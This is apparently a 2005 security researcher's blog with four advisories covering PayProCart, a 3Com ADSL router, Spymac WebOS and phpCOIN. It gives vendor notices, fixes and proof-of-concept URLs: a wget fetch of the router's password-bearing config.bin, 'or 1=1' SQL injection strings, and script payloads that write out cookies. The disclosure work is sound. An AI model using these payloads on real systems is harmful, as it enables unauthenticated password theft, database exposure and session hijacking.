PayProCart Profindcode phpinfo disclosure

Saturday, April 09, 2005
###################################################
PayProcart 3.x phpinfo disclosure
vendor url:http://www.profitcode.net/products/payprocart.html
vendor notified: yes exploit avaible: yes
original advisore:http://lostmon.blogspot.com/2005/04/
payprocart-profindcode-phpinfo.html
OSVDB ID:15422
Secunia: SA14832
###################################################


PayProcart installs a filed called phpinfos.php in the webroot folder
by default, this file calls phpinfo()
This reveals very intimate configuration data of the server running php:


http://[target]/path_to_store/phpinfos.php

solution:

delete this file or edit to established the correct access


thnx to estrella she is always in my mind
thnx to all who support me day at day
thnx to osvdb.org

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangle of: http://www.osvdb.org

La curiosidad es lo que hace mover la mente....

3com adsl 11g cradsl72 router config.bin information disclosure

Saturday, April 02, 2005
########################################
3com adsl 11g 3cradsl72 router config.bin information disclosure.
vendor url:http: www.//3com.com/
vendor notified: yes exploit avaible : yes
advisore url:http://lostmon.blogspot.com/2005/04/
3com-adsl-11g-cradsl72-router.html
dicovered by Lostmon & vIOsOnE
last update: 2005/04/02 update solution.
OSVDB ID:15181
Secunia: SA13942
########################################

A few time ago some flaws are discovered on 3com wireles cradsl72 router:
A new flaw was discovered by me and vIOsOnE A remote user can obtain
al details about configuration of the devide and all passwords (
Internet provider and router password ) without authentication.

firmware versions affected :

1.02b afected
1.05 afected
1.10 not afected

solution:

Upgrade to version 1.10 or higher, as it has been reported to fix this vulnerability.
An upgrade is required as there are no known workarounds.

exploit :

1 open your router with this address http://[target]app_sta.stm
we look the pass of the Internet provider.

2- copy and paste this URL http://[target]/cgi-bin/config.bin
and we obtain the configurations file , inside are all details about
configuration including the pass of the device.


also if you like to bypass all authentication and don´t use
a web browser you can use wget tool and get this

wget http://xxx.xxx.xxx.xxx/cgi-bin/config.bin

and with wget we need only one url to exploting this issue


thnx to estrella to be my ligth
thnx to all who day by da suuport me
thnx to vIOsOnE he is with me and investigate ;)
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data mangler of: http://www.osvdb.org

La curiosidad es lo que hace mover la mente....

Spymac Web os 3.0 Multiple variable XSS

Sunday, March 13, 2005
#######################################################
Spymac Web os 3.0 Multiple variable XSS
vendor url:http://www.spymac.com/network.php?p=webos&wwg=20
Vendor notified : yes exploit avaible : yes
Original advisore: http://lostmon.blogspot.com/2005/03/
spymac-web-os-30-multiple-variable-xss.html
OSVDB ID:15243,1244,15245,15246,15247,15248,15249,
15250,15251,15252,15253,15254,15255

########################################################

Spymac is powered by an integrated collection of applications
(developed in-house)that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending technology
that allows for the creation of an immersive and visually-stunning Web experience.

Spymac flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate some
variables upon submission to some scripts.This could allow a user
to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between the
browser and the server,leading to a loss of integrity.

############
version afected
############

Spymac Web Os 3.0 beta 190

#########
Solution
#########

The vendor has pached all issues in a fast time :D
I send to him four mails, don´t repose any but
Spymac team working &working for fix...
Good work !!!

##########
timeline
##########

Discovered : 2 Mar 2005
Vendor notifyed: 2 Mar 2005
correct issues: 7 Mar 2005
Disclosure : 14 Mar 2005




############
Examples
############


##################
in index.php :
##################

http://[target]/hosting/index.php?show=[XSS-CODE]
http://[target]/news/index.php?catid=11[XSS-CODE]
http://[target]/news/index.php?contentid=1963[XSS-CODE]

###########
in members:
###########

http://[target]/member.php?memberid=172195[XSS-CODE]

###########
in gallery:
###########

http://[target]/gallery/show_photo.php?picid=321126[XSS-CODE]
http://[target]/gallery/show_pics.php?catid=24502[XSS-CODE]
http://[target]/gallery/show_pics.php?catid=547&split=1[XSS-CODE]
http://[target]/gallery/show_photo.php?picid=359869&nr=1[XSS-CODE]
http://[target]/gallery/upload_picture.php?poll=1[XSS-CODE]

##############
in notes.php :
##############

http://[target]/notes.php?action=outbox[XSS-CODE]
http://[target]/notes.php?action=inbox[XSS-CODE]
http://[target]/notes.php?action=pmform[XSS-CODE]
http://[target]/notes.php?totalPms=0&ppp=12&ppp=20&action=inbox[XSS-code]
http://[target]/notes.php?totalPms=0&ppp=12&ppp=20[XSS-code]&action=inbox
http://[target]/notes.php?totalPms=0&ppp=12[XSS-code]&ppp=20&action=inbox
http://[target]/notes.php?totalPms=0[XSS-code]&ppp=12&ppp=20&action=inbox

##########
in forums
##########

http://[target]/forums/showthread.php?threadid=160053[XSS-CODE]
http://[target]/forums/threadlist.php?catid=708[XSS-CODE]
http://[target]/forums/manager.php?action=myforums[XSS-CODE]
http://[target]/forums/newreply.php?threadid=159939[XSS-CODE]
http://[target]/forums/newpoll.php?catid=&threadid=[XSS-CODE]
http://[target]/forums/newthread.php?catid=&threadid=[XSS-CODE]
http://[target]/forums/manager.php?typ=favs&c=0&ppp=12[XSS-code]
http://[target]/forums/manager.php?typ=favs&c=0[XSS-code]&ppp=12
http://[target]/forums/manager.php?typ=favs[XSS-code]&c=0&ppp=12
http://[target]/forums/manager.php?typ=[XSS-code]favs&c=0&ppp=12
http://[target]/forums/newpoll.php?catid=&threadid=[XSS-code]
http://[target]/forums/newpoll.php?catid=[XSS-code]&threadid=
http://[target]/forums/newthread.php?catid=&threadid=[XSS-code]
http://[target]/forums/newthread.php?catid=[XSS-code]&threadid=

########
Others
########

http://[target]/network.php?p=tos[XSS-CODE]

for exploiting some flaws need to login.(member sections, parts of forums,etc)

atentamente:

Lostmon(lostmon@gmail.com)

Thnx to estrella to be my ligth.
Thnx to all who belibed in me.
Thnx to spymac Team , don´t respond ; but working &working for correct :DDD

Web-blog: http://Lostmon.blogspot.com
--
La curiosidad es lo que hace mover la mente...

phpcoin posible sql injection comands and XSS

Tuesday, March 01, 2005
#############################################
phpcoin posible sql injection commands and XSS
vendor url:http://www.phpcoin.com/
vendor notified : yes exploit avaible:yes
advisore:http://lostmon.blogspot.com/2005/03/
phpcoin-posible-sql-injection-comands.html
last updated 05/03/2005
OSVDB ID:15043,15044,15045,15046,15047,15048....
Secunia: SA14439
Securitytracker:1013329
#############################################


phpCOIN Is a free software package originally designed for web-hosting resellers to handle clients, orders, invoices,
notes and helpdesk, but no longer limited to hosting resellers.
Some variables are not properly validate and permits
sql injection commands and cross-site scripting attacks.

############
sql injection:
############

dislose some sql data...

http://[target]phpcoin/mod.php?mod=siteinfo&id=1'

ummm them ...

http://[target]phpcoin/mod.php?mod=faq
&mode=show&faq_id=2%20or%201=1

http://[target]phpcoin/mod.php?mod=
pages&mode=view&id=25%20or%201=1

http://[target]phpcoin/mod.php?mod=
siteinfo&id=4%20or%201=1

http://[target]phpcoin/mod.php?mod=
articles&mode=list&dtopic_id=1%20or%201=1

http://[target]phpcoin/mod.php?mod=
orders&mode=view&ord_id=1002%20or%201=1

http://[target]phpcoin/mod.php?mod=
domains&mode=view&dom_id=2%20or%201=1

http://[target]phpcoin/mod.php?mod=
invoices&mode=view&invc_id=1002%20or%201=1

for exploiting some flaws need a client or admin login

#################
cross site scripting
#################

http://[target]phpcoin/mod.php?mod=helpdesk&mode=new
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/mod.php?mod=mail&mode=reset&w=user
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/login.php?w=user&o=login&e=u
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/login.php?w=admin&o=login
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

Other script are subceptibles to injection html or javascript code...

##################
versions afected :
##################

1.2.0
1.2.1b
1.2.1

##########
Solution :
##########
no solution was avaible at this time look for vendor information
or for new release versions.

atentamente:
Lostmon (lostmon@gmail.com)

Thnx to estrella to be my ligth
Thnx to all who belibed in me

Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

######################
updated at 04/03/2005
######################

Today i recive a mail From a person who is worried
for their phpcoin servers, and a mail whith a vendor
respose where , he say ,is working for a fix and give
to me some code for look. Good !!

I decided delete the update post ,for no alarm any people.
any issue found is "critical"... but need to fix ... and
phpcoin vendor is working now for a fix you can look here :

http://forums.phpcoin.com/index.php?showtopic=4116

thnx Karl for your mail :)

#####################
Updated at 05/03/2005
#####################

phpCOIN vendor has released to me version 1.2.2
of phpCOIN i prove all issues and aparently all
now are pached , Good work !!

Solution:

wait for release the version and update your instalation.
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends